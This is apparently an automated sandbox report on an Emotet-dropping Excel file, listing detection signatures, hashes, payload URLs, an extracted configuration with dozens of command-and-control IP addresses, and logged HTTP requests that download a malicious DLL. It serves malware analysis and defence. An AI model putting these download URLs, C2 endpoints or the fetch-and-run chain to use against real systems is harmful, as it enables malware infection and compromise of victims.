Windows Analysis Report
364453688149503140239183.xls

Overview

General Information

Sample Name: 364453688149503140239183.xls
Analysis ID: 562430
MD5: 4097bbda61bfb39067eab29fb342e34e
SHA1: ca13a07a1eb59e7b30f217239a0db63235354c49
SHA256: 4d876f4afaf9df30d8b9ecaeddd86defa6dedd94dcaa933d67fe578b9cabdc18
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Obfuscated command line found
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://91.240.118.168/vvv/ppp/fe.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe Avira URL Cloud: Label: malware
Source: http://cmit.valestudios.com/wp-admin/RueGJ41A/ Avira URL Cloud: Label: malware
Source: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/ Avira URL Cloud: Label: phishing
Source: http://91.240.118.168/vvv/ppp/fe.htmlv1.0 Avira URL Cloud: Label: malware
Source: http://bawelnianka.cfolks.pl/wp-content/Ttv/ Avira URL Cloud: Label: phishing
Source: http://ayoobeducationaltrust.in Avira URL Cloud: Label: phishing
Source: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.pngPE3 Avira URL Cloud: Label: malware
Source: http://cmit.valestudios.com/wp-a Avira URL Cloud: Label: malware
Source: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3 Avira URL Cloud: Label: malware
Source: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlmshta Avira URL Cloud: Label: malware
Source: http://test.valestudios.com/wp-c Avira URL Cloud: Label: malware
Source: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3 Avira URL Cloud: Label: phishing
Source: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/ Avira URL Cloud: Label: malware
Source: http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.png Avira URL Cloud: Label: malware
Source: http://test.dreamcityorlando.com Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlC: Avira URL Cloud: Label: malware
Source: http://curvygirlsboutique.com/jf Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.html3 Avira URL Cloud: Label: malware
Source: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3 Avira URL Cloud: Label: malware
Source: http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3 Avira URL Cloud: Label: phishing
Source: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html Avira URL Cloud: Label: malware
Source: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/ Avira URL Cloud: Label: phishing
Source: http://91.240.118.168 URL Reputation: Label: malware
Found malware configuration
Source: 11.2.rundll32.exe.200000.1.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Multi AV Scanner detection for submitted file
Source: 364453688149503140239183.xls ReversingLabs: Detection: 18%
Multi AV Scanner detection for domain / URL
Source: ayoobeducationaltrust.in Virustotal: Detection: 9% Perma Link
Source: http://cmit.valestudios.com/wp-admin/RueGJ41A/ Virustotal: Detection: 12% Perma Link
Machine Learning detection for dropped file
Source: C:\ProgramData\QWER.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: ayoobeducationaltrust.in
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /vvv/ppp/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/LmOOeDnNo0dh4vkN/ HTTP/1.1Host: ayoobeducationaltrust.inConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:28:51 GMTServer: ApacheSet-Cookie: 61f4520308e3e=1643401731; expires=Fri, 28-Jan-2022 20:29:51 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:28:51 GMTExpires: Fri, 28 Jan 2022 20:28:51 GMTContent-Disposition: attachment; filename="xfm.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /vvv/ppp/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 22
Source: 364453688149503140239183.xls.0.dr String found in binary or memory: http://91.2
Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168
Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe
Source: mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424658641.0000000000578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448904152.000000000053B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447450916.0000000000597000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.html
Source: mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.html17
Source: mshta.exe, 00000004.00000003.447334668.0000000000536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447356395.000000000053E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448911645.0000000000542000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.html3
Source: mshta.exe, 00000004.00000002.448978311.0000000000598000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424658641.0000000000578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447450916.0000000000597000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlC:
Source: mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.426307315.000000000320D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.426086113.0000000003205000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html
Source: mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlmshta
Source: mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlv1.0
Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690418906.000000001B4AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.png
Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/vvv/ppp/fe.pngPE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ayoobeducationaltrust.in
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ayoobeducationaltrust.in/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bawelnianka.cfolks.pl/wp-
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bawelnianka.cfolks.pl/wp-content/Ttv/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cmit.vale
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cmit.valestudios.com/wp-a
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cmit.valestudios.com/wp-admin/RueGJ41A/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cmit.valestudios.com/wp-admin/RueGJ41A/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crm.compr
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crm.compracasaenhouston.c
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://curvygirlsboutique.com/jf
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://huculek.f
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://huculek.futurehost.pl/ima
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://lynsmithgroup.com/hftm2i2
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sellin.ap
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sellin.app/wp-admin/S2cDP
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sellin.app/wp-admin/S2cDPYXNKEnT/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.drea
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.dreamcityorlando.com
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.dreamcityorlando.com/t0mmx/xBBXi/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.dreamcityorlando.com/t0mmx/xBBXi/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.vale
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.valestudios.com/wp-c
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://thesocialagent.net/b/MO5A
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/
Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3
Source: powershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.424599420.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447384053.00000000033C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000003.424245582.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449466418.0000000003EAB000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424110567.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424721967.0000000003407000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.444232743.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449284684.000000000340B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449350682.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425017595.0000000003408000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/
Source: rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/gYIhzp
